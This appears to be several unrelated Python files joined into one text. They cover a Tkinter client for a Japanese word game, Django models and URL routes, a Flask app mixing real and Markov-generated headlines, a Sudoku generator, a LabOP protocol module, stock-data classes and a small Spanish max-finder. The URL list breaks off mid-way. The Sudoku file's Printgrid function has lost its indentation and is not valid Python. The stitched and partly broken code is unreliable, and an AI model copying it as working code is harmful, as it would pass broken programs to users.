    label1 = tk.Label(main_frame, text="ゲーム内で表示されるユーザ名を入力してください。")
    label2 = tk.Label(main_frame, text="name")
    label1.pack()
    label2.place(relx=0.39, rely=0.39)
    name_form = tk.Entry(main_frame)
    name_form.place(relx=0.39, rely=0.43, relwidth=0.25, relheight=0.05)
    sign_in_btn = tk.Button(main_frame, text="start", command=start_game)
    sign_in_btn.place(relx=0.48, rely=0.5, relwidth=0.07, relheight=0.05)
def part_window():
    # Second screen: choose one of the three Parts.
    def select_room(part):
        client.enter(part)
        print(part.number)
        main_frame.destroy()
        section_window(part)

    def back():
        start_window()

    main_frame = tk.Frame(root)
    main_frame.place(relx=0, rely=0, relwidth=1, relheight=1)
    label1 = tk.Label(main_frame, text="Partを選択してください。")
    label1.pack()
    # `rooms` is presumably a module-level list of Part objects received from
    # the server -- TODO confirm against the surrounding file.
    button1 = tk.Button(main_frame, text="Part" + str(rooms[0].number), command=lambda: select_room(rooms[0]))
    button2 = tk.Button(main_frame, text="Part" + str(rooms[1].number), command=lambda: select_room(rooms[1]))
    button3 = tk.Button(main_frame, text="Part" + str(rooms[2].number), command=lambda: select_room(rooms[2]))
    button1.place(relx=0.05, rely=0.2, relwidth=0.3, relheight=0.5)
    button2.place(relx=0.35, rely=0.2, relwidth=0.3, relheight=0.5)
    button3.place(relx=0.65, rely=0.2, relwidth=0.3, relheight=0.5)
    back_button = tk.Button(main_frame, text="戻る", command=back)
    back_button.place(relx=0.95, rely=0.95, relwidth=0.05, relheight=0.05)
def section_window(part):
    # Third screen: choose a Section within *part*.  Buttons are laid out in
    # rows of four; extra rows appear only when the part has enough sections.
    def select_room(section):
        main_frame.destroy()
        client.enter(section)
        print(section.number)
        part_section_window(section)

    def back():
        # Leave the current Part before going back to Part selection.
        client.leave()
        part_window()

    main_frame = tk.Frame(root)
    main_frame.place(relx=0, rely=0, relwidth=1, relheight=1)
    label1 = tk.Label(main_frame, text="Sectionを選択してください。")
    label1.pack()
    button1 = tk.Button(main_frame, text="Section" + str(part.sections[0].number),
                        command=lambda: select_room(part.sections[0]))
    button1.place(relx=0.04, rely=0.05, relwidth=0.23, relheight=0.3)
    button2 = tk.Button(main_frame, text="Section" + str(part.sections[1].number),
                        command=lambda: select_room(part.sections[1]))
    button2.place(relx=0.27, rely=0.05, relwidth=0.23, relheight=0.3)
    button3 = tk.Button(main_frame, text="Section" + str(part.sections[2].number),
                        command=lambda: select_room(part.sections[2]))
    button3.place(relx=0.5, rely=0.05, relwidth=0.23, relheight=0.3)
    button4 = tk.Button(main_frame, text="Section" + str(part.sections[3].number),
                        command=lambda: select_room(part.sections[3]))
    button4.place(relx=0.73, rely=0.05, relwidth=0.23, relheight=0.3)
    if len(part.sections) > 4:
        button5 = tk.Button(main_frame, text="Section" + str(part.sections[4].number),
                            command=lambda: select_room(part.sections[4]))
        button5.place(relx=0.04, rely=0.35, relwidth=0.23, relheight=0.3)
        button6 = tk.Button(main_frame, text="Section" + str(part.sections[5].number),
                            command=lambda: select_room(part.sections[5]))
        button6.place(relx=0.27, rely=0.35, relwidth=0.23, relheight=0.3)
        button7 = tk.Button(main_frame, text="Section" + str(part.sections[6].number),
                            command=lambda: select_room(part.sections[6]))
        button7.place(relx=0.5, rely=0.35, relwidth=0.23, relheight=0.3)
        button8 = tk.Button(main_frame, text="Section" + str(part.sections[7].number),
                            command=lambda: select_room(part.sections[7]))
        button8.place(relx=0.73, rely=0.35, relwidth=0.23, relheight=0.3)
    if len(part.sections) > 8:
        button9 = tk.Button(main_frame, text="Section" + str(part.sections[8].number),
                            command=lambda: select_room(part.sections[8]))
        button9.place(relx=0.04, rely=0.65, relwidth=0.23, relheight=0.3)
    back_button = tk.Button(main_frame, text="戻る", command=back)
    back_button.place(relx=0.95, rely=0.95, relwidth=0.05, relheight=0.05)
def part_section_window(section):
    """Show the word-part (品詞) selection screen for *section*.

    Builds one button per word part (up to five) plus a back button.
    Relies on the module-level ``root`` and ``client`` objects.
    """
    def select_room(part_section):
        # Enter the chosen part on the client, then move on to room selection.
        main_frame.destroy()
        client.enter(part_section)
        print(part_section.part_name)
        room_select_window(part_section)
    def back():
        section_window(client.leave())
    main_frame = tk.Frame(root)
    main_frame.place(relx=0, rely=0, relwidth=1, relheight=1)
    label1 = tk.Label(main_frame, text="品詞を選択してください")
    label1.pack()
    # Replaces four (plus one conditional) copy-pasted button definitions with
    # a single loop; the original also raised IndexError when a section had
    # fewer than four word parts.  The first four parts sit on the top row,
    # a fifth (if present) starts the second row.  Binding ``p=part`` as a
    # default argument avoids the late-binding-closure pitfall.
    x_slots = (0.04, 0.27, 0.5, 0.73)
    for idx, part in enumerate(section.word_parts[:5]):
        button = tk.Button(main_frame, text=part.part_name,
                           command=lambda p=part: select_room(p))
        button.place(relx=x_slots[idx % 4],
                     rely=0.05 if idx < 4 else 0.5,
                     relwidth=0.23, relheight=0.45)
    back_button = tk.Button(main_frame, text="戻る", command=back)
    back_button.place(relx=0.95, rely=0.95, relwidth=0.05, relheight=0.05)
def room_select_window(part_section):
    """List the open rooms for *part_section* and let the user join or
    create one.

    Talks to the server through the module-level send/receive helpers;
    the exact message ordering (request, client object, room list) must
    match the server side.
    """
    def create_room():
        main_frame.destroy()
        create_room_window()
    def join_room():
        send_message("request_room")
        # Recover room name, player limit, and room id from the selected
        # listbox entry text, then send them tagged with "j" (join).
        for i in room_listbox.curselection():
            msg = room_listbox.get(i)
            join_room_info = re.findall("(?<=ルーム名:).*(?=, 制限人数:)|(?<=制限人数:).*(?=, ルームID:)|(?<=ルームID:).*$", msg)
            join_room_info.append("j")
            send_object(join_room_info)
        main_frame.destroy()
        play_window("j")
    def back():
        part_section_window(client.leave())
    send_message("request_RoomList")
    # Send the client info to the server
    send_object(client)
    # Receive the room list
    room_list = receive_object()
    main_frame = tk.Frame(root)
    main_frame.place(relx=0, rely=0, relwidth=1, relheight=1)
    label1 = tk.Label(main_frame, text="ルームリスト")
    label2 = tk.Label(main_frame, text="※左のリストからルームを選択してから参加ボタンを押してください。", font=("", 6))
    label1.place(relx=0.05, rely=0.01)
    label2.place(relx=0.66, rely=0.7)
    room_list_frame = tk.Frame(main_frame)
    room_list_frame.place(relx=0.05, rely=0.05, relwidth=0.51, relheight=0.9)
    room_listbox = tk.Listbox(room_list_frame)
    # Only rooms still accepting players ("reception") are listed.
    for room in room_list:
        if room["reception"] is True:
            room_listbox.insert(0,
                                "ルーム名:" + room["name"] + ", 制限人数:" + room["player_num"] + ", ルームID:" + room["id"])
    room_listbox.place(relx=0, rely=0, relwidth=1, relheight=1)
    scroll_bar = tk.Scrollbar(room_list_frame, command=room_listbox.yview)
    scroll_bar.pack(side=tk.RIGHT, fill=tk.Y)
    room_listbox.config(yscrollcommand=scroll_bar.set)
    create_room_button = tk.Button(main_frame, text="ルーム作成", command=create_room)
    join_room_button = tk.Button(main_frame, text="参加する", command=join_room)
    back_button = tk.Button(main_frame, text="戻る", command=back)
    create_room_button.place(relx=0.66, rely=0.3, relwidth=0.24, relheight=0.1)
    join_room_button.place(relx=0.66, rely=0.6, relwidth=0.24, relheight=0.1)
    back_button.place(relx=0.95, rely=0.95, relwidth=0.05, relheight=0.05)
def create_room_window():
    """Show the room-creation form (name + player limit) and submit it."""
    def create_room():
        # Read the form, applying defaults: anonymous room name, max 4 players.
        room_name = room_name_form.get()
        room_max = room_maxnum_form.get()
        if room_name == "":
            room_name = "AnonymousRoom" + str(random.randint(0, 100001))
        # Non-numeric input previously crashed with ValueError on int();
        # treat any missing/invalid/too-large entry as the maximum of 4.
        if not room_max.isdigit() or int(room_max) > 4:
            room_max = "4"
        create_room_info = (room_name, room_max, "c")
        send_message("request_room")
        send_object(create_room_info)
        main_frame.destroy()
        play_window("c")
    main_frame = tk.Frame(root)
    main_frame.place(relx=0, rely=0, relwidth=1, relheight=1)
    label1 = tk.Label(main_frame, text="Room Name")
    label2 = tk.Label(main_frame, text="制限人数")
    label1.place(relx=0.4, rely=0.25)
    label2.place(relx=0.4, rely=0.45)
    room_name_form = tk.Entry(main_frame)
    room_maxnum_form = tk.Entry(main_frame)
    room_name_form.place(relx=0.4, rely=0.3, relwidth=0.2, relheight=0.05)
    room_maxnum_form.place(relx=0.4, rely=0.5, relwidth=0.2, relheight=0.05)
    create_button = tk.Button(main_frame, text="作成", command=create_room)
    create_button.place(relx=0.45, rely=0.6, relwidth=0.1, relheight=0.08)
def play_window(permission):
    """Main game screen.

    *permission* is "c" for the room creator and "j" for a joiner; it
    controls which widgets are shown and which leave message is sent.
    """
    def submit_answer(event=None):
        # Shared handler for the send button and the <Return> key
        # (previously duplicated as send_btn / send_entry).
        send_message("answer")
        send_message(msg_form.get())
        msg_form.delete(0, tk.END)
    def back_btn():
        if permission == "c":
            send_message("c_leave_room")
        else:
            send_message("j_leave_room")
        main_frame.destroy()
        room_select_window(client.position[2])
    def display_msg():
        # Receiver loop run on a background thread; dispatches server events.
        index = 0
        while reception is True:
            msg = receive_message()
            print(msg)
            if msg == "correct_answer":
                display_word(index)
                index += 1
                sleep(0.25)
                display_score()
                sleep(0.25)
                print("getScoreList")
            elif msg == "leave_room":
                break
            elif msg == "game_finish":
                display_score()
                sleep(0.25)
                end_frame = tk.Frame(main_frame)
                end_frame.place(relx=0, rely=0.1, relwidth=0.8, relheight=0.9)
                end_msg = tk.Label(end_frame, text="ゲームが終了しました。戻るボタンを押してルームリストに戻ってください。")
                end_msg.place(relx=0.3, rely=0.4)
            elif msg == "room_deleted":
                deleted_label = tk.Label(main_frame, text="この部屋は作成者によって削除されました。戻るボタンから退出してください。")
                deleted_label.place(relx=0.3, rely=0.3)
                message_list_frame.destroy()
                msg_form.destroy()
                send_button.destroy()
            else:
                message_list.insert(0, msg)
            sleep(0.25)
    def display_word(index):
        # Show the current word, scaling the font down for longer words.
        word_frame = tk.Frame(main_frame)
        word_frame.place(relx=0, rely=0, relwidth=0.8, relheight=1)
        word = words[index]
        word_label = tk.Label(word_frame, text=word.japanese, font=("", int(300 / len(word.japanese))))
        word_label.pack(expand=1, fill=tk.BOTH)
    def display_score():
        # Receive the {player: score} mapping and render it as a ranking line.
        score = receive_object()
        score_list = ""
        rank = 1
        for k, v in score.items():
            score_list += str(rank) + "位:" + k + "," + str(v) + "p ; "
            rank += 1
        score_label = tk.Label(main_frame, text=score_list)
        score_label.place(relx=0, rely=0)
    main_frame = tk.Frame(root)
    main_frame.place(relx=0, rely=0, relwidth=1, relheight=1)
    # Message list (frame, listbox, scrollbar).
    message_list_frame = tk.Frame(main_frame)
    message_list_frame.place(relx=0.8, rely=0, relwidth=0.2, relheight=0.9)
    message_list = tk.Listbox(message_list_frame)
    message_list.place(relx=0, rely=0, relwidth=1, relheight=1)
    scroll_bar = tk.Scrollbar(message_list_frame, command=message_list.yview)
    scroll_bar.pack(side=tk.RIGHT, fill=tk.Y)
    message_list.config(yscrollcommand=scroll_bar.set)
    # Fetch the word list for this game.
    send_message("request_words")
    words = receive_object()
    print("receive words")
    # Answer input field; <Return> submits exactly like the send button.
    msg_form = tk.Entry(main_frame, width=30)
    msg_form.place(relx=0.8, rely=0.9, relwidth=0.15, relheight=0.05)
    msg_form.bind("<Return>", submit_answer)
    # send / back buttons
    send_button = tk.Button(main_frame, text="send", command=submit_answer)
    send_button.place(relx=0.95, rely=0.9, relwidth=0.05, relheight=0.05)
    back_button = tk.Button(main_frame, text="戻る", command=back_btn)
    back_button.place(relx=0.95, rely=0.95, relwidth=0.05, relheight=0.05)
    # BUGFIX: the original used `permission is "c"`, which relies on CPython
    # string interning (and warns on 3.8+); use equality instead.
    if permission == "c":
        label1 = tk.Label(main_frame, text="ゲームを開始する場合は「Start」を押してください。", font=("", 20))
        label1.place(relx=0, rely=0)
        button2 = tk.Button(main_frame, text="Start", command=lambda: send_message("game_start"))
        button2.place(relx=0.3, rely=0.4, relwidth=0.3, relheight=0.2)
    if permission == "j":
        label1 = tk.Label(main_frame, text="部屋作成者によってゲームが開始されるまで待機してください。", font=("", 15))
        label1.place(relx=0, rely=0)
    # Background thread that receives and dispatches server messages.
    p = threading.Thread(target=display_msg)
    p.start()
def on_closing():
    """Confirm quitting; on OK, notify the server and tear down the UI."""
    if not messagebox.askokcancel("Quit", "Do you want to quit?"):
        return
    # "-10" is the disconnect sentinel the server expects.
    send_message("-10")
    root.destroy()
# ----------------------------------------------------------------------------------------------------------- #
# Main
# Script entry point: connect to the game server, build the Tk UI, and run
# the event loop until the window is closed.
# create a socket object
soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# get local machine name
host = socket.gethostname()
port = 9999
print('start client')
# connection to hostname on the port.
soc.connect((host, port))
client = Client()
# Initial payload pushed by the server on connect (room snapshot).
rooms = receive_object()
# Flag polled by play_window's receiver thread; cleared on shutdown so
# that thread's while-loop can terminate.
reception = True
root = tk.Tk()
root.title("Room")
root.geometry("800x500")
root.protocol("WM_DELETE_WINDOW", on_closing)
start_window()
root.mainloop()
reception = False
soc.close()
print("disconnection")
|
from django.db import models
from django.contrib.gis.db import models as geomodels
from django.contrib.auth.models import User
from django.conf.__init__ import settings
class UserProfile(User):
    ''' User profile
    Represents a user that has account in the system

    Extends ``django.contrib.auth.models.User`` (multi-table inheritance)
    with contact details and a geographic location.
    '''
    class Meta:
        verbose_name = 'user profile'
        verbose_name_plural = 'user profiles'
    # Postal / contact details; all required (null=False, blank=False).
    country = models.CharField(max_length=255, null=False, blank=False, help_text="")
    city = models.CharField(max_length=255, null=False, blank=False, help_text="")
    zipcode = models.CharField(max_length=20, null=False, blank=False, verbose_name="Zip code", help_text="")
    address = models.CharField(max_length=1024, null=False, blank=False, help_text="")
    birth_date = models.DateField(help_text="format: dd/mm/yyyy")
    mobile_number = models.CharField(max_length=30, help_text="")
    # Point stored in the SRID configured via settings.SPHERICAL_MERCATOR.
    location = geomodels.PointField(srid=settings.SPHERICAL_MERCATOR, help_text="")
    # NOTE(review): GeoManager was removed in Django 2.0 — presumably this
    # project pins an older Django; confirm before upgrading.
    objects = geomodels.GeoManager()
    def __unicode__(self):
        # Python 2 style string conversion; under Python 3 this would be __str__.
        return "%s %s" % (self.first_name, self.last_name)
    def __repr__(self):
        return "<UserProfile: %s %s>" % (self.first_name, self.last_name)
import scraper
import markov
from flask import Flask
from flask import jsonify
from flask_cors import CORS
import numpy as np
# Flask app with CORS enabled so a browser frontend can call it cross-origin.
app = Flask(__name__)
CORS(app)
def list_to_json(headlines):
    """Wrap raw headline strings into the API response payload.

    Each headline becomes ``{'content': <text>, 'real': True}`` under the
    top-level ``headlines`` key.
    """
    wrapped = [{'content': headline, 'real': True} for headline in headlines]
    return {'headlines': wrapped}
# Scrape real headlines once at import time, feed them to the Markov
# generator, and build the shared response payload (add_fakes presumably
# appends generated entries — defined in the markov module).
headlines = scraper.get_headlines()
m_gen = markov.Markov(headlines)
json = list_to_json(headlines)  # NOTE: name shadows the stdlib `json` module
m_gen.add_fakes(json)
index = 0  # NOTE(review): appears unused
@app.route('/')
def all_headlines():
    # Shuffle in place (mutates the shared module-level payload across
    # requests), then return the first 10 entries.
    np.random.shuffle(json['headlines'])
    smaller_json = dict(json)
    smaller_json['headlines'] = smaller_json['headlines'][:10]
    return jsonify(smaller_json)
app.run('0.0.0.0')
import random
def MakeSudoku():
    """Build a 9x9 grid, randomly place 25 valid numbers, and print it.

    Each placement retries random (row, col, num) triples until the cell is
    empty and the number does not conflict with its row, column, or 3x3 box.
    """
    # The comprehension already zero-fills every cell; the original re-zeroed
    # the grid in a second, redundant nested loop (removed).
    Grid = [[0 for x in range(9)] for y in range(9)]
    # The range here is the amount of numbers placed in the grid.
    for i in range(25):
        # choose random numbers; reroll while the cell is taken or invalid
        row = random.randrange(9)
        col = random.randrange(9)
        num = random.randrange(1, 10)
        while not CheckValid(Grid, row, col, num) or Grid[row][col] != 0:
            row = random.randrange(9)
            col = random.randrange(9)
            num = random.randrange(1, 10)
        Grid[row][col] = num
    Printgrid(Grid)
def Printgrid(Grid):
TableTB = "|--------------------------------|"
TableMD = "|----------+----------+----------|"
print(TableTB)
for x in range(9):
for y in range(9):
if ((x == 3 or x == 6) and y == 0):
print(TableMD)
if (y == 0 or y == 3 or y== 6):
print("|", end=" ")
print(" " + str(Grid[x][y]), end=" ")
if (y == 8):
print("|")
print(TableTB)
# |-----------------------------|
# | 0 0 0 | 0 0 0 | 0 0 0 |
# | 0 0 0 | 0 0 0 | 0 0 0 |
# | 0 0 0 | 0 0 0 | 0 0 0 |
# |---------+---------+---------|
# | 0 0 0 | 0 0 0 | 0 0 0 |
# | 0 0 0 | 0 0 0 | 0 0 0 |
# | 0 0 0 | 0 0 0 | 0 0 0 |
# |---------+---------+---------|
# | 0 0 0 | 0 0 0 | 0 0 0 |
# | 0 0 0 | 0 0 0 | 0 0 0 |
# | 0 0 0 | 0 0 0 | 0 0 0 |
# |-----------------------------|
def CheckValid(Grid, row, col, num):
    """Return True when *num* may legally go at (row, col): no duplicate in
    the row, the column, or the enclosing 3x3 box."""
    # column clash
    if any(Grid[r][col] == num for r in range(9)):
        return False
    # row clash
    if any(Grid[row][c] == num for c in range(9)):
        return False
    # 3x3 box clash
    box_r = (row // 3) * 3
    box_c = (col // 3) * 3
    for r in range(box_r, box_r + 3):
        for c in range(box_c, box_c + 3):
            if Grid[r][c] == num:
                return False
    return True
MakeSudoku()
|
import json
import logging
import os
from abc import ABC
import tyto
import labop
import uml
from labop.primitive_execution import input_parameter_map
# Module-level logger; WARNING level keeps specialization chatter quiet.
l = logging.getLogger(__file__)
l.setLevel(logging.WARN)
# Local copy of the container ontology, resolved relative to this file.
container_ontology_path = os.path.join(
    os.path.dirname(os.path.realpath(__file__)),
    "../labop/container-ontology.ttl",
)
# Ontology handle used as the fallback when the remote container server
# is unavailable (see BehaviorSpecialization.resolve_container_spec).
ContO = tyto.Ontology(
    path=container_ontology_path,
    uri="https://sift.net/container-ontology/container-ontology",
)
class BehaviorSpecializationException(Exception):
    """Raised for errors while specializing a protocol behavior."""
    pass
class ContainerAPIException(Exception):
    """Raised for errors while resolving containers via the container API."""
    pass
class BehaviorSpecialization(ABC):
    """
    This abstract class defines an API for different conversions from LabOP
    to other formats, such as Markdown or Autoprotocol.

    Subclasses override `_init_behavior_func_map` to register one handler
    per behavior URI; `process` dispatches execution records to them.
    """
    def __init__(self) -> None:
        super().__init__()
        self._behavior_func_map = self._init_behavior_func_map()
        self.top_protocol = None
        self.execution = None
        self.issues = []  # accumulated failure messages / exceptions
        self.out_dir = None
        self.objects = {}
        # This data field holds the results of the specialization
        self.data = []
    def initialize_protocol(self, execution: labop.ProtocolExecution, out_dir=None):
        """Attach the execution to specialize and an optional output directory."""
        self.execution = execution
        self.out_dir = out_dir
    def _init_behavior_func_map(self) -> dict:
        """Map behavior URIs to handler callables; subclasses extend this."""
        return {}
    def on_begin(self, execution: labop.ProtocolExecution):
        """Reset collected results before a specialization pass."""
        self.data = []
    def on_end(self, execution: labop.ProtocolExecution):
        """Finalize results: append the execution graph, serialize, and save."""
        try:
            dot_graph = execution.to_dot()
            self.data.append(str(dot_graph.source))
        except Exception as e:
            msg = "Could not render dot graph for execution in DefaultBehaviorSpecialization"
            # Logger.warn is deprecated; also include the cause in the log.
            l.warning("%s: %s", msg, e)
            self.issues.append(msg)
        self.data = json.dumps(self.data)
        if self.out_dir:
            with open(
                os.path.join(self.out_dir, f"{self.__class__.__name__}.json"),
                "w",
            ) as f:
                f.write(self.data)
    def process(self, record, execution: labop.ProtocolExecution):
        """Dispatch one execution record to the registered behavior handler.

        Subprotocols dispatch on their type URI; primitives on their behavior
        URI, falling back to the generic `handle` when unregistered.
        """
        try:
            node = record.node.lookup()
            if not isinstance(node, uml.CallBehaviorAction):
                return  # raise BehaviorSpecializationException(f"Cannot handle node type: {type(node)}")
            # Subprotocol specializations
            behavior = node.behavior.lookup()
            if isinstance(behavior, labop.Protocol):
                return self._behavior_func_map[behavior.type_uri](record, execution)
            # Individual Primitive specializations
            elif str(node.behavior) not in self._behavior_func_map:
                l.warning(f"Failed to find handler for behavior: {node.behavior}")
                return self.handle(record, execution)
            return self._behavior_func_map[str(node.behavior)](record, execution)
        except Exception as e:
            # BUGFIX: `node` is unbound when record.node.lookup() itself
            # raised; the original would then raise NameError here.
            behavior_name = (
                node.behavior.split("#")[-1] if "node" in locals() else record.node
            )
            l.warning(f"{self.__class__} Could not process {behavior_name}: {e}")
            self.handle_process_failure(record, e)
    def handle_process_failure(self, record, e):
        """Record the failure and re-raise; subclasses may override to recover."""
        self.issues.append(e)
        raise e
    def handle(self, record, execution):
        # Save basic information about the execution record
        node = record.node.lookup()
        params = input_parameter_map(
            [
                pv
                for pv in record.call.lookup().parameter_values
                if pv.parameter.lookup().property_value.direction == uml.PARAMETER_IN
            ]
        )
        params = {p: str(v) for p, v in params.items()}
        node_data = {
            "identity": node.identity,
            "behavior": node.behavior,
            "parameters": params,
        }
        self.update_objects(record)
        self.data.append(node_data)
    def update_objects(self, record: labop.ActivityNodeExecution):
        """
        Update the objects processed by the record.
        Parameters
        ----------
        record : labop.ActivityNodeExecution
            A step that modifies objects.
        """
        pass
    def resolve_container_spec(self, spec, addl_conditions=None):
        # Attempt to infer container instances using the remote container ontology
        # server, otherwise use tyto to look it up from a local copy of the ontology
        try:
            from container_api import matching_containers
        except ImportError:  # was a bare `except:`, which also hid real errors
            l.warning("Could not import container_api, is it installed?")
        else:
            try:
                if addl_conditions:
                    possible_container_types = matching_containers(
                        spec, addl_conditions=addl_conditions
                    )
                else:
                    possible_container_types = matching_containers(spec)
                return possible_container_types
            except Exception as e:
                l.warning(e)
        # This fallback only works when the spec query is a simple container
        # class/instance formatted in Manchester owl as cont:<container_uri>.
        # Other container constraints / query criteria are not supported.
        l.warning(
            f"Cannot resolve container specification using remote ontology server. Defaulting to static ontology copy"
        )
        container_uri = validate_spec_query(spec.queryString)
        if container_uri.is_instance():
            possible_container_types = [container_uri]
        else:
            possible_container_types = container_uri.get_instances()
        return possible_container_types
    def get_container_typename(self, container_uri: str) -> str:
        # Returns human-readable typename for a container, e.g., '96 well plate'
        return ContO.get_term_by_uri(container_uri)
    def check_lims_inventory(self, matching_containers: list) -> str:
        # Override this method to interface with laboratory lims system
        return matching_containers[0]
class DefaultBehaviorSpecialization(BehaviorSpecialization):
    """Fallback specialization: records every supported primitive (and
    protocol) through the generic `handle` bookkeeping method."""
    def _init_behavior_func_map(self) -> dict:
        # All registered behaviors share the generic record-keeping handler.
        return {
            "https://bioprotocols.org/labop/primitives/sample_arrays/EmptyContainer": self.handle,
            "https://bioprotocols.org/labop/primitives/liquid_handling/Provision": self.handle,
            "https://bioprotocols.org/labop/primitives/sample_arrays/PlateCoordinates": self.handle,
            "https://bioprotocols.org/labop/primitives/spectrophotometry/MeasureAbsorbance": self.handle,
            "https://bioprotocols.org/labop/primitives/liquid_handling/TransferByMap": self.handle,
            "http://bioprotocols.org/labop#Protocol": self.handle,
        }
def validate_spec_query(query: str) -> "tyto.URI":
    """Normalize a container-spec query into a `tyto.URI` within ContO.

    Accepts an existing `tyto.URI`, a full `<ontology-uri>#<term>` URI, or a
    `cont:<term>` qname; anything else raises ValueError.
    """
    # isinstance (rather than `type(...) is`) also accepts URI subclasses.
    if isinstance(query, tyto.URI):
        return query
    if "#" in query:
        # Query is assumed to be a URI
        tokens = query.split("#")
        if len(tokens) > 2 or tokens[0] != ContO.uri:
            raise ValueError(
                f"Cannot resolve container specification '{query}'. The query is not a valid URI"
            )
        return tyto.URI(query, ContO)
    # Query is assumed to be a qname
    if ":" in query:
        tokens = query.split(":")
        if (
            len(tokens) > 2 or tokens[0] != "cont"
        ):  # TODO: use prefixMap instead of assuming the prefix is `cont`
            raise ValueError(
                f"Cannot resolve container specification '{query}'. Is the query malformed?"
            )
        return tyto.URI(query.replace("cont:", ContO.uri + "#"), ContO)
    raise ValueError(
        f"Cannot resolve container specification '{query}'. Is the query malformed?"
    )
|
from ui.TextOutput import TextOutput
# Will serve as a proxy between output and output libraries
# For now, it just links to the TextOutput library.
class UI:
    """Facade between game logic and the output layer.

    Currently delegates every call to a fresh TextOutput instance; other
    output backends could be substituted here later.
    """
    def __init__(self):
        return
    def show_text(self, text):
        # Display a piece of text.
        TextOutput().show(text)
    def show_line(self, text):
        # Display a full line of text.
        TextOutput().line(text)
    def show_options(self, options):
        # Display a set of selectable options.
        TextOutput().options(options)
    def list_targets(self, targets):
        # Display the available targets.
        TextOutput().targets(targets)
# -*- coding: utf-8 -*-
from cachetools import cached
from dateutil import parser
import pandas as pd
import quandl
from omaha.joinable import Joinable
class Company(Joinable):
    """Container for the financial indicators of the public company
    Attributes:
        ticker (str): Ticker symbol
        from_q (str): Beginning quarter of the target range
        to_q (str): End quarter of the target range
        client (Client): BuffettCode API Client
    """
    def __init__(self, ticker, from_q, to_q, client):
        self.ticker = ticker
        self.client = client
        self.from_q = from_q
        self.to_q = to_q
        super().__init__([self])
    @classmethod
    def dict_pairs(cls, d, keys):
        """Return the subset of dict *d* restricted to *keys*."""
        return {k: v for k, v in d.items() if k in keys}
    # NOTE(review): `cache={}` is shared across all instances and keyed on
    # (self, from_q, to_q), so every Company stays alive for the cache's
    # lifetime — same caveat as lru_cache on methods.
    @cached(cache={})
    def __get(self, from_q, to_q):
        # Single API round-trip for the quarter range; memoized above.
        return self.client.quarter(self.ticker, from_q, to_q)
    def __str__(self):
        return f"Company({self.ticker}, {self.from_q}, {self.to_q})"
    def __repr__(self):
        return self.__str__()
    def get(self, item):
        """Return per-quarter dicts containing *item* plus fiscal year/quarter."""
        res = self.__get(self.from_q, self.to_q)
        keys = [item, "fiscal_year", "fiscal_quarter"]
        return [Company.dict_pairs(d, keys) for d in res[self.ticker]]
    def all(self):
        """Return the raw list of quarter records for this ticker."""
        res = self.__get(self.from_q, self.to_q)
        return res[self.ticker]
    def raw_df(self):
        """Return the quarter records as a DataFrame indexed by UTC end_date."""
        res = self.__get(self.from_q, self.to_q)
        df = pd.DataFrame(res[self.ticker])
        index = [pd.Timestamp(s, tz="UTC") for s in df["end_date"]]
        df.index = index
        return df
class Stockprice(Joinable):
    """Container for the daily stockprice of the public company.

    Prices are pulled from Quandl's XJPX dataset for the given date range.
    """
    def __init__(self, ticker, start_date, end_date):
        self.ticker = ticker
        self.start_date = start_date
        self.end_date = end_date
        super().__init__([self])
    def raw_df(self):
        """Return daily prices as a DataFrame with a UTC DatetimeIndex."""
        # The Quandl dataset code is the ticker with a trailing "0".
        df = quandl.get(
            f"XJPX/{self.ticker}0", start_date=self.start_date, end_date=self.end_date
        )
        df.index = [pd.Timestamp(s, tz="UTC") for s in df.index]
        return df
|
from django.db import models
from django.contrib.auth.models import User
class Post(models.Model):
    """Blog post with optional image, linked to its author."""
    title = models.CharField(max_length=50)  # mysql VARCHAR(50)
    body = models.TextField()  # mysql text
    date = models.DateTimeField(auto_now_add=True)  # set once at creation
    img = models.ImageField(default='default.png', blank=True)
    author = models.ForeignKey(User, default=None, on_delete=models.DO_NOTHING)
    # pip install pillow
    # python manage.py makemigrations blog
    # python manage.py migrate
    # python manage.py runserver
    def __str__(self):
        return self.title
    def bogino(self):
        """Return a preview of the body, ellipsized only when truncated."""
        # BUGFIX: '...' used to be appended even when the body was already
        # 50 characters or shorter.
        if len(self.body) <= 50:
            return self.body
        return self.body[:50] + '...'
#! /usr/bin/env python
# -*- coding: utf-8 -*-
def max_in_list(list):
    """Return the largest integer in *list*.

    Assumes a non-empty list; raises IndexError otherwise (original
    behavior preserved).  The parameter name shadows the builtin ``list``
    but is kept for interface compatibility.
    """
    # Track the running maximum without shadowing the builtin `max`
    # (the original bound a local variable named `max`).
    maximum = list[0]
    for item in list[1:]:
        if item > maximum:
            maximum = item
    return maximum
def parse_listOfStrings_to_listOfIntegers(list):
    """Convert a list of strings to a list of integers.

    Prints an error and returns [] when any element is not a valid
    integer literal.
    """
    try:
        return [int(text) for text in list]
    except ValueError as e:
        print("La lista debe contener unicamente enteros positivos y negativos")
        print(e)
        return []
# Entry point: prompt for a comma-separated list of integers and report
# the maximum, or complain when the input is empty or invalid.
message="Proporcione la lista de la cual se busca encontrar el numero maximo, debe estar en el formato: number1,number2,number3...numberN; ejemplo: 23,5456,123,4653,-123 - "
listAsString=input(message)
if len(listAsString)>0:
    listOfStrings=listAsString.split(',')
    # NOTE: `list` shadows the builtin from here on.
    list=parse_listOfStrings_to_listOfIntegers(listOfStrings)
    if len(list)>0:
        print("El numero maximo es: ",max_in_list(list))
else:
    print("No se ha proporcionado una lista")
|
from django.urls import path
from . import views
# Namespace used when reversing URLs, e.g. `tasks:index`.
app_name = "tasks"
# CRUD + state-toggle routes for tasks, events, and routines, plus
# schedule and statistics pages.
urlpatterns = [
    path("tasks/", views.IndexView.as_view(), name="index"),
    path("events/", views.EventView.as_view(), name="event_index"),
    path("schedule/", views.ScheduleView.as_view(), name="schedule"),
    path("task/<int:pk>/", views.TaskDetail.as_view(), name="task_detail"),
    path("new_task/", views.TaskCreate.as_view(), name="create_task"),
    path("task/<int:pk>/edit/", views.TaskUpdate.as_view(), name="edit_task"),
    path("task/<int:pk>/delete/", views.TaskDelete.as_view(), name="delete_task"),
    # Function-based views toggling task state / time bookkeeping.
    path("task/<int:task_id>/mark_done/", views.mark_task_done, name="mark_as_done"),
    path("task/<int:task_id>/mark_todo/", views.mark_task_todo, name="mark_as_todo"),
    path(
        "task/<int:task_id>/change_time_spent/",
        views.change_time_spent,
        name="change_time_spent",
    ),
    path("event/<int:pk>/", views.EventDetail.as_view(), name="event_detail"),
    path("new_event/", views.EventCreate.as_view(), name="create_event"),
    path("event/<int:pk>/edit/", views.EventUpdate.as_view(), name="edit_event"),
